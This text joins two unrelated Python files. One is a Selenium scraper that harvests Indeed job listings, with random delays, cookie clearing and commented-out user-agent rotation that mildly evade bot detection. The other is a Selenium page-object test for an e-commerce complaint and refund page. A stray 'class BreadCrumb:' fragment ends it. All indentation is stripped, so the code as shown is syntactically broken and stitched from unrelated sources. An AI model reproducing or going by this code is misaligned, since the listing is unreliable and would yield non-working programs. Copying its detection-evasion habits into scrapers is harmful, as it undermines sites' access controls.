# -*- coding: utf-8 -*-
"""
Created on Wed May 27 09:08:16 2020
@author: peter_goodridge
"""
from selenium import webdriver
import time
from selenium.common.exceptions import TimeoutException, ElementClickInterceptedException, NoSuchElementException, StaleElementReferenceException
import json
from datetime import datetime
import random
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import hashlib
import urllib.parse as urlparse
from urllib.parse import parse_qs
import re
from datetime import date, timedelta, datetime
#from google.cloud import bigquery
#from google.oauth2 import service_account
import pandas as pd
import os
import numpy as np
#from random_user_agent.user_agent import UserAgent
#from random_user_agent.params import SoftwareName, OperatingSystem
"""
key_path = "*********"
credentials = service_account.Credentials.from_service_account_file(
key_path,
scopes=["https://www.googleapis.com/auth/cloud-platform"],
)
"""
"""
client = bigquery.Client(
credentials=credentials,
project=credentials.project_id,
)
"""
#software_names = [SoftwareName.CHROME.value]
#operating_systems = [OperatingSystem.WINDOWS.value]
#user_agent_rotator = UserAgent(software_names=software_names,
#operating_systems=operating_systems,
#limit=100)
#user_agent = user_agent_rotator.get_random_user_agent()
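# save_job_info writes one scraped posting to C:\Indeed Temp\<job_id>.json, so each job is persisted
# to disk as soon as it is scraped rather than held in memory for the whole session.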
def save_job_info(job_id, job_info):
fname2 = 'C:\\Indeed Temp\\' + job_id + '.json'
#fname2 = 'c:\\Indeed temp\\' + dice_id + '.json'
with open(fname2, 'w') as f:
json.dump(job_info, f)
return
def load_bq(job_info, running_jobs):
#unused but could be adapted to Azure
row = pd.DataFrame(job_info)
raw_len = len(row)
row = row.dropna()
diffs = raw_len - len(row)
print('There were {} total jobs and we returned {} jobs'.format(running_jobs, raw_len))
print("{} Jobs were droppped because of nulls".format(diffs))
row.to_gbq('DW__test.raw_job_postings_tech', credentials = credentials, project_id = credentials.project_id, if_exists = 'append')
table = client.get_table('DW__test.indeed_scraping_results')
client.insert_rows(table, [(datetime.timestamp(datetime.now()), running_jobs, raw_len, diffs)])
def length_check(element):
if len(element) >=1:
return element[0].text
else:
print('element not found')
return ''
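# get_date turns Indeed's relative posting-date strings ("Today", "Just posted", "30+ days ago")
# into an absolute MM/DD/YYYY date, falling back to today's date if the string cannot be parsed.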
def get_date(date_raw):
try:
if date_raw.lower().strip() in ['today', 'just posted']:
lag = 0
elif date_raw:
regex = re.compile('(\d+)')
string_raw = re.match(regex, date_raw).group(1)
lag = int(string_raw)
else:
print('no date no error')
lag = 0
job_date = date.today() - timedelta(lag)
job_date = job_date.strftime('%m/%d/%Y')
except Exception as e:
print("Error: " + str(e))
print('no date', date_raw)
job_date = date.today().strftime('%m/%d/%Y')
return job_date
def get_card_info(cards, card_id):
company = length_check(cards[card_id].find_elements_by_class_name('companyName'))
location = length_check(cards[card_id].find_elements_by_class_name('companyLocation'))
date_raw = length_check(cards[card_id].find_elements_by_class_name('date'))
title = length_check(cards[card_id].find_elements_by_xpath('.//h2[contains(@class,"jobTitle ")]'))#'.//' keeps the search inside this card rather than the whole page
card_info = {'company': company, 'date': get_date(date_raw), 'location': location, 'job_title': title}
return card_info
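# get_job_info builds the record for one posting: an MD5 hash of title+company+location as a stable
# fallback id, plus Indeed's own job key taken from the 'vjk' (or 'jk') query parameter of the URL.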
def get_job_info(driver_instance, job_data, state, job_desc):
#WebDriverWait(driver, 120).until(EC.presence_of_element_located((By.ID, "vjs-tab-job")))
#print('job_desc: ', driver2.find_elements_by_class_name('jobsearch-jobDescriptionText'))
#if len(driver_instance.find_elements_by_id('vjs-tab-job')) > 0:
#job_desc = driver_instance.find_elements_by_id('vjs-tab-job')
#else:
#WebDriverWait(driver, 180).until(EC.presence_of_element_located((By.ID, "vjs-tab-job")))
#WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.ID, "jobsearch-JobComponent-embeddedBody")))
#job_desc = driver_instance.find_elements_by_class_name('jobsearch-jobDescriptionText')
url = driver_instance.current_url#after a redirect, we'll get the short url that should always have the job_id
print('Cur url: ', url)
unique_name = job_data['job_title']+job_data['company']+job_data['location']
print(unique_name)
if len(unique_name) > 1 and len(job_desc) > 0:#only save if we have a valid title and employer
job_id = hashlib.md5(unique_name.encode('utf-8')).hexdigest()
parsed = urlparse.urlparse(url)
try:
true_job_id = parse_qs(parsed.query).get('vjk')[0]
except Exception as e:
print("Error: " + str(e))
true_job_id = parse_qs(parsed.query).get('jk')[0]
print('true Job ID:', true_job_id)
if true_job_id:
true_id = 1
else:
true_id = 0
true_job_id = ''
job_info = {
'job_desc' : job_desc,
#'company': length_check(company),
#'location': length_check(location),
#'job_title' : length_check(job_title),
'job_id': job_id,
'url': url,
#'job_date': get_date(date_raw),
'scrape_time': datetime.timestamp(datetime.now()),
'skill': 'technology', #eventually, we'll expand to HT, ENG, etc.
'state': state,
'true_job_id': true_job_id,
'true_id': true_id
}
job_info.update(job_data)
save_job_info(job_info['true_job_id'], job_info)
return
print('Problem with a job!!!')
def initialize_driver():
#user_agent = user_agent_rotator.get_random_user_agent()
options = Options()
#options.add_argument('--headless')
#options.add_argument(f'user agent={user_agent}')
fp = webdriver.FirefoxProfile()
#fp.set_preference("general.useragent.override", user_agent)
fp.set_preference("geo.enabled", False)#so Dice doesn't change the URL you pass it
fp.set_preference('browser.cache.memory.enable', False)
#fp.set_preference('network.cookie.cookieBehavior', 2)
#fp.set_preference('headless', True)
driver = webdriver.Firefox(options = options, firefox_profile = fp)
driver.delete_all_cookies()
driver.set_window_size(1600, 900)
return driver
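# time_filter drives the search form directly: it fills the "what"/"where" boxes, submits, and then
# applies the "Last 24 hours" date-posted filter (skipped when the result page has no filter bar).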
def time_filter(driver, query, state):
try:
driver.find_element_by_id('text-input-where').clear()
except:
driver.find_element_by_id('text-input-where').clear()
finally:
driver.find_element_by_id('text-input-where').clear()
#where.send_keys('anywhere')
search_bar = driver.find_elements_by_id('text-input-what')
search_bar[0].send_keys(query)
time.sleep(1)
#search_bar[0].submit()
#time.sleep(3)
where_bar = driver.find_elements_by_id('text-input-where')
where_bar[0].send_keys(state)
time.sleep(1)
where_bar[0].submit()
time.sleep(3)
date_posted_filter = driver.find_elements_by_id('filter-dateposted')
if len(date_posted_filter) > 0: #if there are no jobs, there is no filter
date_posted_filter[0].click()
time.sleep(1)
driver.find_element_by_partial_link_text('24 hours').click()
def get_accounts(path, file_name):
return pd.read_csv(path + file_name, encoding='latin1')
def get_days_diff(client):
#Not used. I believe this was used to fill in dates when the date was null
import datetime
q1 = """
select distinct date
from DW__test.raw_job_postings
;
"""
dates = client.query(q1).result().to_dataframe()
def convert_date(x):
return datetime.datetime.strptime(x, '%m/%d/%Y').date()
dates['date'] = dates['date'].map(lambda x: convert_date(x))
last_date = dates.max()[0]
diff = (datetime.date.today() - last_date).days
return diff
def get_temp(directory):
all_listings=[]
for _, _, files in os.walk(directory):
for file in files:
file_name = os.path.join(directory, file)
with open(file_name, 'r') as f:
data = json.load(f)
if not data.get('date'):
data['date'] = date.fromtimestamp(data['scrape_time']).strftime('%m/%d/%Y')
all_listings.append(data)
return pd.DataFrame(all_listings)
def delete_temp(directory):
for _, _, files in os.walk(directory):
for file in files:
file_name = os.path.join(directory, file)
os.remove(file_name)
def create_search_entry(key_word='technology'):
#Not used because not restricting salary range
salary = random.choice(list(range(0,91)))
return '{}'.format(key_word, salary)
def create_direct(state, keyword='banking'):
#salary = random.choice(list(range(80,91)))
base_string = 'https://www.indeed.com/jobs?q={}&l={}&fromage=30&filter=0'
return base_string.format(keyword, state)
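# e.g. create_direct('MA') -> 'https://www.indeed.com/jobs?q=banking&l=MA&fromage=30&filter=0'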
def x_note(driver, html_type, identifier):
if html_type == 'class_name':
cookie_note = driver.find_elements_by_class_name(identifier)
elif html_type == 'id':
cookie_note = driver.find_elements_by_id(identifier)
else:
print('use a different html_type')
time.sleep(1)
if len(cookie_note) > 0:
cookie_note[0].click()
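# scrape_link opens one randomly chosen result card, reads the job description, and hands the card
# data to get_job_info; on ElementClickInterceptedException (typically an ad overlay) it reloads the
# page and retries, switching into the vjs-container-iframe as a last resort.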
def scrape_link(driver, links, link_ids):
time.sleep(np.random.uniform(4,10))
random.shuffle(link_ids)
if len(link_ids) > 0:
link_id = link_ids.pop()
else:
return 'break'
try:
card_info = get_card_info(links, link_id)
if card_info['job_title'] == '':
raise ElementClickInterceptedException
print(card_info['company'], card_info['location'])
#job_link = driver.find_element_by_xpath('//h2//a[@href]')
#job_link.click()
links[link_id].click()
#iframes no longer used
#driver.switch_to.frame('vjs-container-iframe')
time.sleep(2)
job_desc = driver.find_elements_by_id('jobDescriptionText')[0].text
except ElementClickInterceptedException:
time.sleep(4)
driver.refresh()
print('page reload')
time.sleep(3)
links = driver.find_elements_by_xpath('//ul[@class="{}"]//li/div[contains(@class,"cardOutline")]'.format('jobsearch-ResultsList css-0'))
link_ids = list(range(len(links)))
random.shuffle(link_ids)
#link_id = link_ids.pop()
try:
card_info = get_card_info(links, link_id)
if card_info['job_title'] == '':
raise ElementClickInterceptedException('Ad still blocking')
#job_link = driver.find_element_by_xpath('//h2//a[@href]')
#job_link.click()
#links[link_id].click()
links[link_id].click()
#I didn't see iframes used
#driver.switch_to.frame('vjs-container-iframe')
time.sleep(2)
job_desc = driver.find_elements_by_id('jobDescriptionText')[0].text
except Exception as e:
print("Error: " + str(e))
time.sleep(4)
driver.refresh()
print('page reload')
time.sleep(3)
links = driver.find_elements_by_xpath('//ul[@class="{}"]//li/div[contains(@class,"cardOutline")]'.format('jobsearch-ResultsList css-0'))
link_ids = list(range(len(links)))
random.shuffle(link_ids)
#link_id = link_ids.pop()
card_info = get_card_info(links, link_id)
links[link_id].click()
if len(driver.find_elements_by_id('vjs-container-iframe')) > 0:
driver.switch_to.frame('vjs-container-iframe')
time.sleep(2)
job_desc = driver.find_elements_by_id('jobDescriptionText')[0].text
else:
bad_frames.append(card_info)
return 'continue'
#job_link = driver.find_element_by_xpath('//h2//a[@href]')
#links[link_id].click()
#job_link.click()
#company_jobs = get_job_info(driver2, card_info, duns_id, company_jobs)
get_job_info(driver, card_info, state, job_desc)
driver.switch_to.parent_frame()
print('jobs done')
return 'done'
#time.sleep(random.uniform(0,1))
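# change_page clicks the "next page" pagination control, reloading the page once if an overlay
# intercepts the click; it returns 'break' when there is no next page.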
def change_page(driver):
try:
pagination = driver.find_elements_by_xpath('//span[@class="pagination-page-next"]')
if len(pagination) == 2:
pagination[1].click()
elif len(pagination) == 1:
pagination[0].click()
else:
return 'break'
except ElementClickInterceptedException:
#ads...
#restart_driver(driver, p_num+starting_point)
driver.refresh()
print('page reload')
pagination = driver.find_elements_by_xpath('//span[@class="pagination-page-next"]')
if len(pagination) == 2:
pagination[1].click()
elif len(pagination) == 1:
pagination[0].click()
else:
return 'break'
except Exception as e:
#ads...
#restart_driver(driver, p_num+starting_point)
print("Error: " + str(e))
driver.refresh()
print('page reload')
pagination = driver.find_elements_by_xpath('//span[@class="pagination-page-next"]')
if len(pagination) == 2:
pagination[1].click()
elif len(pagination) == 1:
pagination[0].click()
else:
return 'break'
#search_string = {'q' : 'company:(COTTAGE HEALTH)'}
#url = urllib.parse.urlencode(search_string)
#regex = re.compile('(page \d+ of )(\d+,?\d*)')
regex = re.compile('(\d+)')
running_jobs=0
bad_frames=[]
driver = initialize_driver()
#Search more groups of states if needed
#Because "Banking" will return many jobs searching over multiple state groups
#should be split accross sessions.
state_list = [
["MA", "NH"]
]
states = state_list[0]
for state in states:
print(state)
#if random.choice(range(1,5)) == 1:
#driver.quit()
#driver = initialize_driver(user_agent_rotator)
#if skill == 'Salesforce':
#search_string = {'q' : '"{}" title:salesforce'.format(skill)}
#else:
#search_string = {'q' : 'company:({})'.format(account)}
print(create_search_entry())
#url = urllib.parse.urlencode(search_string)
#company_jobs = [] #this will be loaded into GCP
p_num = 1
while True:
time.sleep(np.random.uniform(1,5))
page_abs = 0 + p_num
job_num = page_abs*10
if p_num >=75:
break
if p_num == 1:
#driver.get('http://indeed.com')
#time_filter(driver, create_search_entry(), state)
driver.get(create_direct(state))
x_note(driver, 'class_name', 'gnav-CookiePrivacyNoticeButton')
#full_url = 'https://www.indeed.com/jobs?{}+${},000%2B&fromage={}'.format(url, random.choice([80,81,82,83,84,85]), job_age)
#print(full_url)
#driver.get(full_url)
#total_jobs_raw = driver.find_elements_by_xpath('//*[@id="searchCountPages"]')
total_jobs_class = 'jobsearch-JobCountAndSortPane-jobCount'
total_jobs_raw = driver.find_elements_by_xpath('//div[@class="{}"]'.format(total_jobs_class))
tos = driver.find_elements_by_css_selector('.tos-Button')
print('tos:', tos)
if len(tos) > 0:
tos[0].click()
print(total_jobs_raw)
if len(total_jobs_raw) > 0:
total_jobs_string = total_jobs_raw[0].text
string_raw = re.match(regex, total_jobs_string.lower()).group(1)
total_jobs = int(string_raw.replace(',', ''))
running_jobs += total_jobs
total_pages = total_jobs//10 + 1
else:
break
"""
if p_num % 10 == 0:
#to free up memory
time.sleep(5)
driver = restart_driver(driver, page_abs, account)
"""
time.sleep(3)
#class_name = 'mosaic-jobcards'
#links = driver.find_elements_by_xpath('//div[@class="{}"]//h2//a[@href]'.format(class_name))
links = driver.find_elements_by_xpath('//ul[@class="{}"]//li/div[contains(@class,"cardOutline")]'.format('jobsearch-ResultsList css-0'))
#for link in links:
# hrefs.append(links[1].get_attribute('href'))
link_ids = list(range(len(links)))
print(len(links))
for i in range(len(link_ids)):
try:
result = scrape_link(driver, links, link_ids)
if result == 'continue':
continue
elif result == 'break':
print('break from inner loop!!!')
break
except StaleElementReferenceException:
links = driver.find_elements_by_xpath('//ul[@class="{}"]//li/div[contains(@class,"cardOutline")]'.format('jobsearch-ResultsList css-0'))
result = scrape_link(driver, links, link_ids)
if result == 'continue':
continue
elif result == 'break':
print('break from inner loop!!!')
print('yolo')
break
except Exception as e:
print(e)
driver.refresh()
time.sleep(4)
print('break from inner loop!!!')
print('yolo')
break
try:
page_result = change_page(driver)
if page_result == 'break':
print('break from outer loop!!!')
time.sleep(5)
break
elif page_result == 'continue':
print('break from outer loop!!!')
time.sleep(5)
continue
except Exception as e:
page_result = change_page(driver)
print("Error: " + str(e))
if page_result == 'break':
print('break from outer loop!!!')
time.sleep(5)
break
elif page_result == 'continue':
continue
p_num+=1
print("Starting Page{}".format(p_num))
dupe_text = driver.find_elements_by_class_name('dupetext')
if p_num > total_pages or len(dupe_text) > 0:
break
#load_bq(company_jobs)
#all_jobs = get_temp('/home/peter_goodridge/indeed-scraping/Indeed temp/')
#load_bq(all_jobs, running_jobs)
#delete_temp('/home/peter_goodridge/indeed-scraping/Indeed temp/')
|
import os,sys, time
from main.page.base import *
from main.function.general import *
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium import webdriver
from random import randint
import time
import re
import math
class ResolutionCenter(BasePage):
_pl = "resolution-center.pl"
#locator path
_menu_reso_center = (By.XPATH, "/html/body/div[1]/div[5]/div/div[1]/ul/li[1]/div[2]/div/ul/li[6]/a")
_list_reso_log = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/div[3]/div[1]/div/table")
_shop_name = (By.XPATH, ".//*[@id='resolution-23918']/div[2]/div/p/span[3]/a")
_status_reso2 = (By.XPATH, ".//*[@id='all-dispute-list']")
_counter_complain_from_buyer = (By.XPATH, ".//*[@id='as-seller-link']/span/span")
_counter_all_page = (By.XPATH, ".//*[@id='all-dispute-list']/div[2]/div[1]/div/small/b[2]")
_inv_reso_detail = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div[2]/div[2]/div/p/a")
_next_page = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/div[3]/div[2]/div[2]/div/div/ul/li[4]/a/strong")
_detail_textarea_loc = (By.XPATH, "//textarea[@id='reply-textarea']")
_detail_button_submit = (By.XPATH, ".//*[@id='submit-comment']")
_detail_upload_files = (By.XPATH, ".//*[@id='pickfiles']")
_detail_edit_solution = (By.ID, "edit-solution")
_detail_confirm_solution = (By.ID, "confirm-solution")
_button_confirm_solution = (By.XPATH, ".//*[@id='rf']/div/button[2]")
### What problem occur in the order ?
# The Quantity is different
_detail_checkbox_1_of_3 = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div[2]/form/div/div[6]/div[2]/div/div/div[3]/label[1]/input")
# Send remaining product
_detail_checkbox_2_of_3 = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/form/div/div[6]/div[4]/div/ul/li[3]/label/input")
_change_other_checkbox_up = (By.XPATH, ".//*[@id='trouble-box']/div/div[3]/label[1]/input")
### What solution you want ?
_change_other_checkbox_down = (By.XPATH, ".//*[@id='trouble-box']/div/div[3]/label[1]/input")
_complaint_time = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div[2]/div[2]/div/p/span[1]")
_response_checkbox_up = (By.XPATH, ".//*[@id='trouble-box']/div/div/label")
_response_checkbox_up_2 = (By.XPATH, ".//*[@id='trouble-box']/div/div/label/input")
_response_checkbox_down = (By.XPATH, ".//*[@id='solution-choice-div']/div[4]/div/ul/li/label")
_problem_1_loc = (By.XPATH, ".//*[@id='trouble-box']/div/div[2]/label[1]/input")
_problem_2_loc = (By.XPATH, ".//*[@id='trouble-box']/div/div[2]/label[2]/input")
_problem_3_loc = (By.XPATH, ".//*[@id='trouble-box']/div/div[3]/label[1]/input")
_problem_4_loc = (By.XPATH, ".//*[@id='trouble-box']/div/div[3]/label[2]/input")
_total_invoice_s1 = (By.XPATH, ".//*[@id='solution-choice-div']/div[4]/div/ul/li[1]/div/span")
_total_invoice_s3 = (By.XPATH, ".//*[@id='solution-choice-div']/div[4]/div/ul/li[4]/div/span")
_total_invoice_s4 = (By.XPATH, ".//*[@id='ship_fee_span']")
_fill_amount_refund_money_s1 = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/form/div/div[6]/div[4]/div/ul/li[1]/div/input")
_fill_amount_refund_money_s3 = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/form/div/div[6]/div[4]/div/ul/li[4]/div/input")
_fill_amount_refund_money_s4 = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/form/div/div[6]/div[3]/input")
#_total_invoice = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/form/div/div[6]/div[4]/div/ul/li[1]/div/span/strong")
_solution_1_loc = (By.XPATH, ".//*[@id='refund-sol']")
_solution_2_loc = (By.XPATH, ".//*[@id='retur-good']")
_solution_3_loc = (By.XPATH, ".//*[@id='retur-refund']")
_solution_4_loc = (By.XPATH, ".//*[@id='send-remain']")
_solution_5_loc = (By.XPATH, ".//*[@id='solution-choice-div']/div[3]/input")
_dict_problem = {
'problem_1_Text' : 'Product not same as description',
'problem_2_Text' : 'Product is broken',
'problem_3_Text' : 'The Quantity is different',
'problem_4_Text' : 'Shipping agency is different'
}
_dict_solution_ = {
'solution_1_Text' : 'Refund Money',
'solution_2_Text' : 'Return product as order',
'solution_3_Text' : 'Return product and refund',
'solution_4_Text' : 'Send remaining product'
}
def open(self, site=""):
self._open(site, self._pl)
def view_complaint(self, driver, inv):
cond = False
try:
WebDriverWait(driver, 10).until(EC.presence_of_element_located(self._status_reso2))
#self.check_visible_element(*self._status_reso2)
status_temp = self.driver.find_element(*self._status_reso2)
if status_temp.is_displayed():
if ("Tidak ada data resolusi" in status_temp.text or "No Resolution Data" in status_temp.text):
print("No Resolution Data")
else:
counter = int(self.driver.find_element(*self._counter_complain_from_buyer).text)
sum_page = int(self.driver.find_element(*self._counter_all_page).text)
total_page = math.ceil(sum_page/10)
x, y, z = 0, int(counter/10), int(counter%10)
if(z > 0):
y += 1
while x < y and not cond:
print("\n")
print("You are in Resolution Center page, in My Complaint tab section")
print("Page", [int(x+1)], "of", [total_page])
list_reso = self.find_elements(*self._list_reso_log)
for i in list_reso:
if inv in i.text:
time.sleep(2)
id_reso = i.find_element(By.TAG_NAME, "tr").get_attribute("id")
ticket_reso = self.find_element(By.XPATH, "//*[@id='"+id_reso+"']")
ticket_reso.click()
time.sleep(2)
shop_name_reso = self.driver.find_element(By.XPATH, ".//*[@id='resolution-"+id_reso+"']/div[2]/div/p/span[3]/a").text
inv_number = self.driver.find_element(*self._inv_reso_detail).text
time_complain = self.driver.find_element(*self._complaint_time).text
if (inv_number == inv):
print ("The ticket resolution is valid in detail page")
print("Shop name : ", shop_name_reso," | ", inv_number )
print("Complaint Create Time : ", time_complain)
cond = True
break
time.sleep(1)
x += 1
if(x < y and not cond):
self.next_page()
print("Next page Resolution Center")
time.sleep(2)
if(not cond):
print("Resolution ticket like ", inv , "is Not Found!\n")
except Exception as inst:
print(inst)
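# fill_message_and_choose_problem types the reply comment, opens the solution editor and ticks the
# problem checkbox selected by choose_problem (1-4). The switch()/case() helpers used below are
# assumed to come from the star import of main.function.general.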
def fill_message_and_choose_problem(self, driver, reply_comment, choose_problem, total_shipping_fee):
print ("Trying to choose Problem...")
#WebDriverWait(driver, 10).until(EC.presence_of_element_located(self._detail_textarea_loc))
input_comment = self.driver.find_element(*self._detail_textarea_loc)
input_comment.clear()
input_comment.send_keys(reply_comment)
self.driver.find_element(*self._detail_edit_solution).click()
time.sleep(2)
self.desc_problem = choose_problem
while switch(choose_problem):
if case(1):
responsiblity_checkbox_1 = self.find_elements(*self._response_checkbox_up)
for i in responsiblity_checkbox_1:
cond1 = self._dict_problem['problem_1_Text']
if cond1 in i.text:
time.sleep(1)
self.driver.find_element(*self._problem_1_loc).click()
time.sleep(4)
check_validate_p1 = self.find_element(*self._problem_1_loc).get_attribute("checked")
if check_validate_p1 == "true":
print ("Other checkbox option of solution like - Product not same as description- is Checked")
else:
print ("**** Other checkbox option of solution like - Product not same as description- is NOT Checked !!!")
break
if case(2):
responsiblity_checkbox_2 = self.find_elements(*self._response_checkbox_up)
for i in responsiblity_checkbox_2:
cond2 = self._dict_problem['problem_2_Text']
if cond2 in i.text:
time.sleep(4)
self.driver.find_element(*self._problem_2_loc).click()
time.sleep(4)
check_validate_p2 = self.find_element(*self._problem_2_loc).get_attribute("checked")
if check_validate_p2 == "true":
print ("Other checkbox option of solution like -Product is broken- is Checked")
else:
print ("**** Other checkbox option of solution like -Product is broken- is NOT Checked !!!")
break
if case(3):
responsiblity_checkbox_3 = self.find_elements(*self._response_checkbox_up)
for i in responsiblity_checkbox_3:
cond3 = self._dict_problem['problem_3_Text']
if cond3 in i.text:
time.sleep(1)
self.driver.find_element(*self._problem_3_loc).click()
time.sleep(4)
check_validate_p3 = self.find_element(*self._problem_3_loc).get_attribute("checked")
if check_validate_p3 == "true":
print ("Other checkbox option of solution like -The Quantity is different- is Checked")
else:
print ("**** Other checkbox option of solution like -The Quantity is different- is NOT Checked !!!")
break
if case(4):
responsiblity_checkbox_4 = self.find_elements(*self._response_checkbox_up)
for i in responsiblity_checkbox_4:
self.cond4 = self._dict_problem['problem_4_Text']
if self.cond4 in i.text:
time.sleep(1)
self.driver.find_element(*self._problem_4_loc).click()
time.sleep(2)
check_validate_p4 = self.find_element(*self._problem_4_loc).get_attribute("checked")
if check_validate_p4 == "true":
print ("Other checkbox option of solution like -Shipping agency is different- is Checked")
else:
print ("**** Other checkbox option of solution like -Shipping agency is different- is NOT Checked !!! \n Please Check It")
print ("\nTrying to insert Total Shiping Fee...\n")
time.sleep(1)
getnum= self.driver.find_element(*self._total_invoice_s4)
enum = getnum.find_element(By.TAG_NAME, "strong").text
splitnum = enum.split(".")
join = "".join(splitnum)
current_amount = int(re.search(r'\d+', join).group())
self.driver.find_element(*self._fill_amount_refund_money_s4).clear()
self.driver.find_element(*self._fill_amount_refund_money_s4).send_keys(total_shipping_fee)
time.sleep(1)
if current_amount < int(total_shipping_fee):
print ("Error, the amount you filled in exceeds the available Rp "+str(current_amount)+",-")
print ("Your entered amount is Rp "+total_shipping_fee+",-")
os._exit(1)
else:
self.driver.find_element(*self._detail_confirm_solution).click()
self.driver.find_element(*self._button_confirm_solution).click()
time.sleep(4)
self.driver.find_element(*self._detail_edit_solution).click()
time.sleep(1)
result_amount = self.driver.find_element(*self._fill_amount_refund_money_s4).get_attribute("value")
if (total_shipping_fee != result_amount):
print("Requested refund amount and actual refund amount are not the same")
else:
print ("Checkbox option of solution as input shipping fee has been successfully inserted")
print ("================================")
self.validate_problem()
print ("Attempt amount is Rp "+total_shipping_fee+",-")
print ("Result amount is Rp " +result_amount+",-")
print ("================================")
print ("Solution succesfully changed")
print ("All process finished")
os._exit(1)
break
def choose_solution(self, driver, choose_solution, fill_refund_money):
print ("\nTrying to choose Solution...\n")
self.solution = choose_solution
while switch(choose_solution):
if case(1):
responsiblity_checkbox_1 = self.find_elements(*self._response_checkbox_down)
for i in responsiblity_checkbox_1:
cond = self._dict_solution_['solution_1_Text']
if cond in i.text:
time.sleep(1)
self.driver.find_element(*self._solution_1_loc).click()
time.sleep(1)
getnum= self.driver.find_element(*self._total_invoice_s1)
enum = getnum.find_element(By.TAG_NAME, "strong").text
splitnum = enum.split(".")
join = "".join(splitnum)
current_amount = int(re.search(r'\d+', join).group())
self.driver.find_element(*self._fill_amount_refund_money_s1).clear()
self.driver.find_element(*self._fill_amount_refund_money_s1).send_keys(fill_refund_money)
time.sleep(2)
if current_amount < int(fill_refund_money):
print ("Error, the amount you filled in exceeds the available Rp "+str(current_amount)+",-")
print ("Your entered amount is Rp "+fill_refund_money+",-")
os._exit(1)
else:
self.driver.find_element(*self._detail_confirm_solution).click()
self.driver.find_element(*self._button_confirm_solution).click()
time.sleep(4)
self.driver.find_element(*self._detail_edit_solution).click()
time.sleep(1)
result_amount = self.driver.find_element(*self._fill_amount_refund_money_s1).get_attribute("value")
check_validate_s1 = self.find_element(*self._solution_1_loc).get_attribute("checked")
if check_validate_s1 == "true":
if (fill_refund_money != result_amount):
print("Refund money and actual refund money is not same")
else:
print ("Checkbox option of solution like -Shipping agency is different- is Checked")
print ("================================")
self.validate_problem()
print ("The solution is "+ cond)
print ("Attempt amount is Rp "+fill_refund_money+",-")
print ("Result amount is Rp " +result_amount+",-")
print ("================================")
print ("Solution succesfully changed")
print ("All process finished")
else:
print ("**** Other checkbox option of solution like -Shipping agency is different- is NOT Checked !!!")
break
if case(2):
responsiblity_checkbox_2 = self.find_elements(*self._response_checkbox_down)
for i in responsiblity_checkbox_2:
cond = self._dict_solution_['solution_2_Text']
if cond in i.text:
time.sleep(1)
self.driver.find_element(*self._solution_2_loc).click()
time.sleep(1)
self.driver.find_element(*self._detail_confirm_solution).click()
self.driver.find_element(*self._button_confirm_solution).click()
time.sleep(4)
self.driver.find_element(*self._detail_edit_solution).click()
check_validate_s2 = self.find_element(*self._solution_2_loc).get_attribute("checked")
if check_validate_s2 == "true":
print ("Checkbox option of solution like -Return product as order- is Checked")
print ("================================")
self.validate_problem()
print ("The solution is "+ cond)
print ("================================")
print ("Solution succesfully changed")
print ("All process finished")
else:
print ("**** Checkbox option of solution like -Return product as order- is NOT Checked !!!")
break
if case(3):
responsiblity_checkbox_3 = self.find_elements(*self._response_checkbox_down)
for i in responsiblity_checkbox_3:
cond = self._dict_solution_['solution_3_Text']
if cond in i.text:
time.sleep(1)
self.driver.find_element(*self._solution_3_loc).click()
time.sleep(1)
getnum= self.driver.find_element(*self._total_invoice_s3)
enum = getnum.find_element(By.TAG_NAME, "strong").text
splitnum = enum.split(".")
join = "".join(splitnum)
current_amount = int(re.search(r'\d+', join).group())
self.driver.find_element(*self._fill_amount_refund_money_s3).clear()
self.driver.find_element(*self._fill_amount_refund_money_s3).send_keys(fill_refund_money)
time.sleep(2)
if current_amount < int(fill_refund_money):
print ("Error, the amount you filled in exceeds the available Rp "+str(current_amount)+",-")
print ("Your entered amount is Rp "+fill_refund_money+",-")
os._exit(1)
else:
self.driver.find_element(*self._detail_confirm_solution).click()
self.driver.find_element(*self._button_confirm_solution).click()
time.sleep(4)
self.driver.find_element(*self._detail_edit_solution).click()
time.sleep(1)
result_amount = self.driver.find_element(*self._fill_amount_refund_money_s3).get_attribute("value")
check_validate_s1 = self.find_element(*self._solution_3_loc).get_attribute("checked")
if check_validate_s1 == "true":
if (fill_refund_money != result_amount):
print("Refund money and actual refund money is not same")
else:
print ("Checkbox option of solution like -Return product and refund- is Checked")
print ("================================")
self.validate_problem()
print ("The solution is "+ cond)
print ("Attempt amount is Rp "+fill_refund_money+",-")
print ("Result amount is Rp " +result_amount+",-")
print ("================================")
print ("Solution succesfully changed")
print ("All process finished")
else:
print ("**** Other checkbox option of solution like -Return product and refund- is NOT Checked !!!")
break
if case(4):
responsiblity_checkbox_2 = self.find_elements(*self._response_checkbox_down)
for i in responsiblity_checkbox_2:
cond = self._dict_solution_['solution_4_Text']
if cond in i.text:
time.sleep(1)
self.driver.find_element(*self._solution_4_loc).click()
time.sleep(1)
self.driver.find_element(*self._detail_confirm_solution).click()
self.driver.find_element(*self._button_confirm_solution).click()
time.sleep(4)
self.driver.find_element(*self._detail_edit_solution).click()
check_validate_s2 = self.find_element(*self._solution_4_loc).get_attribute("checked")
if check_validate_s2 == "true":
print ("Checkbox option of solution like -Send remaining product- is Checked")
print ("================================")
self.validate_problem()
print ("The solution is "+ cond)
print ("================================")
print ("Solution succesfully changed")
print ("All process finished")
else:
print ("**** Checkbox option of solution like -Return product as order- is NOT Checked !!!")
break
def next_page(self):
try:
next_other_page = self.driver.find_element(*self._next_page)
next_other_page.click()
time.sleep(2)
except Exception as inst:
print(inst)
def validate_problem(self):
if self.desc_problem == 1:
print ("The problem is Product not same as description")
elif self.desc_problem == 2:
print ("The problem is Product is broken")
elif self.desc_problem == 3:
print ("The problem is The Quantity is different")
elif self.desc_problem == 4:
print ("The problem is Shipping agency is different")
|
class BreadCrumb:
